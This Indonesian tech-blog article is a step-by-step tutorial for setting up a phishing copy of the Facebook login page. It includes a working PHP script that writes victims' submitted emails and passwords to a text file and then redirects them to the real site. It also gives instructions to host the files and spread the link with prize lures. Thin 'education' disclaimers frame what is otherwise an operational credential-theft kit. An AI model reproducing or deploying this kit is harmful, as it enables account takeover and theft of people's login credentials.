Cara Menggunakan Script Hack FB untuk Bikin Fake Login, 100% Works!

Ditulis oleh Ayu Pratiwi - Thursday, 20 July 2023, 18:45
Simak script hack FB terbaru 2023 untuk membuat fake login dengan kode HTML untuk FB. Cek selengkapnya di sini sebagai bentuk edukasi!

Facebook adalah salah satu media sosial terpopuler di dunia yang memiliki banyak pengguna. Namun, hal ini juga membuat Facebook menjadi sasaran para hacker yang ingin mencuri data di Facebook atau mengambil alih akun orang lain. Salah satu cara yang sering digunakan oleh hacker adalah script hack FB.

Script hack FB adalah sebuah kode program yang dibuat untuk menipu pengguna Facebook dengan membuat halaman login palsu. Dengan cara ini, hacker bisa mendapatkan email dan password pengguna yang tidak sadar bahwa mereka sedang masuk ke situs palsu.

Tentu saja, hal ini sangat berbahaya bagi keamanan dan privasi pengguna Facebook. Oleh karena itu, kamu harus mengetahui bagaimana script hack FB bekerja dan bagaimana cara mencegahnya. Berikut ini adalah informasi lengkap yang bisa kamu simak!

DISCLAIMER:

Cara hack Facebook dengan script hack FB login palsu yang akan dibagikan di bawah ini hanya bersifat sebagai edukasi untuk langkah preventif guna mencegah hal ini terjadi padamu, geng.

Tentang Metode Hack FB dengan Script/Kode HTML

Sumber foto: IST - Tutorial fake login dengan script hack FB ini bisa kamu uji ke teman untuk menguji kejelian mereka.

Teknik hacking phising adalah salah satu metode hacking yang populer di kalangan hacker. Mereka membuat kode HTML untuk FB dan membuat halaman login palsu yang tampak sama dengan yang asli. Tujuannya adalah untuk mengelabui pengguna agar memasukkan email dan password mereka ke halaman fake login Facebook tersebut.

Data tersebut lalu disimpan di hosting hacker dan bisa dipakai untuk mengakses akun FB korban. Ini sangat membahayakan dan merugikan, bukan? Makanya, kamu harus tahu bagaimana cara kerja pembuatan script HTML hack FB yang sering dipakai untuk metode ini.

Baca Juga: Cara Menggunakan Termux untuk Pemula, Bisa Jalankan Program hingga Hack Akun!

ADVERTISEMENT

Cara Melakukan Script Hack FB

Sumber foto: IST - Tutorial fake login dengan script hack FB ini bisa kamu uji ke teman untuk menguji kejelian mereka.

Sebelum mengikuti tutorial kali ini, sangat diperlukan penggunaan hosting atau web hosting untuk dapat mengunggah script hack FB yang sudah dimodifikasi. Hal itu membuat korban lebih mudah terjebak.

Berikut langkah-langkah melakukan Script Hack FB, pastikan cuma kamu simak sebagai informasi saja, ya!

  1. Simpan halaman login Facebook (http://www.facebook.com/login.php/) yang bisa dibuka pada Google Chrome.
  2. Cara simpannya dengan klik kanan > pilih opsi Save As....
  3. Hasil unduhan tadi sendiri bakal berupa sebuah file "Masuk Facebook _ Facebook.html" dan folder "Masuk Facebook _ Facebook_files".
  4. Download script hack FB bernama "Masuk Facebook _ Facebook.html" yang bisa kamu unduh di bawah ini.

Download di sini: Script Hack FB untuk Fake Login

  1. Timpa file sebelumnya dengan meletakkannya pada folder yang sama.
  2. Buat script tambahan berupa file bernama next.php. Caranya dengan copy-paste script hack FB di bawah ini ke Notepad dan simpan dengan nama next.php.

<?php header('Location: http://www.Facebook.com/login.php'); $handle = fopen('pass.txt', 'a'); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, '='); fwrite($handle, $value); fwrite($handle, '\n'); } fwrite($handle, '\n'); fclose($handle); exit; ?>

  1. Perhatikan, diperlukan file Notepad kosong yang diberi nama pass.txt yang berguna untuk menampung email dan password Facebook milik korban.
  2. Upload semua file dan script Facebook tadi ke layanan file hosting yang sudah kamu buat.
  3. File yang harus diunggah adalah folder "Masuk Facebook _ Facebook_files", file "Masuk Facebook _ Facebook.html" yang tadi di-download, next.php, dan pass.txt.
  4. Jika semua langkah di atas sudah dilakukan, sekarang tinggal sebarkan link login palsu Facebook yang sudah dibuat tadi.

Seorang hacker bisa saja membuatnya dengan kalimat pengantar yang berisikan iming-iming untuk mendapatkan hadiah berbekal login Facebook saja.

Kalau script hack FB yang sudah kamu dibuat tadi bekerja, maka file pass.txt akan merekam email dan password Facebook korban.

DISCLAIMER:

Jaka tidak menjamin penerapan script hack FB bakal berhasil 100% walaupun sudah mengikuti langkah-langkah di atas. Pasalnya Facebook terus meng-update sistem keamanannya untuk mencegah celah peretasan. Selain itu, cara ini juga sangat tidak dianjurkan dan dapat melanggar hukum yang berlaku.

Baca Juga: Cara Hack FB Orang Lain Tanpa Ketahuan 2023: 5 Metode Ampuh!

Akhir Kata

Nah, itulah pembahasan lengkap bagaimana cara menggunakan script hack FB yang banyak dilakukan oleh para peretas. Meski begitu, Jaka hanya menjadikan cara di atas sebagai bentuk edukasi agar kamu dapat lebih berhati-hati ke depannya.

Maka dari itu, jangan sekali-kali sembarangan login ke suatu laman tanpa memperhatikan alamat URL-nya terlebih dulu, ya. Semoga bermanfaat!

Baca artikel dan berita menarik dari JalanTikus lainnya di Google News

Baca juga artikel seputar Hiburan, Viral, atau artikel menarik lainnya dari Syifa Nuri Khairunnisa.

Kembali Keatas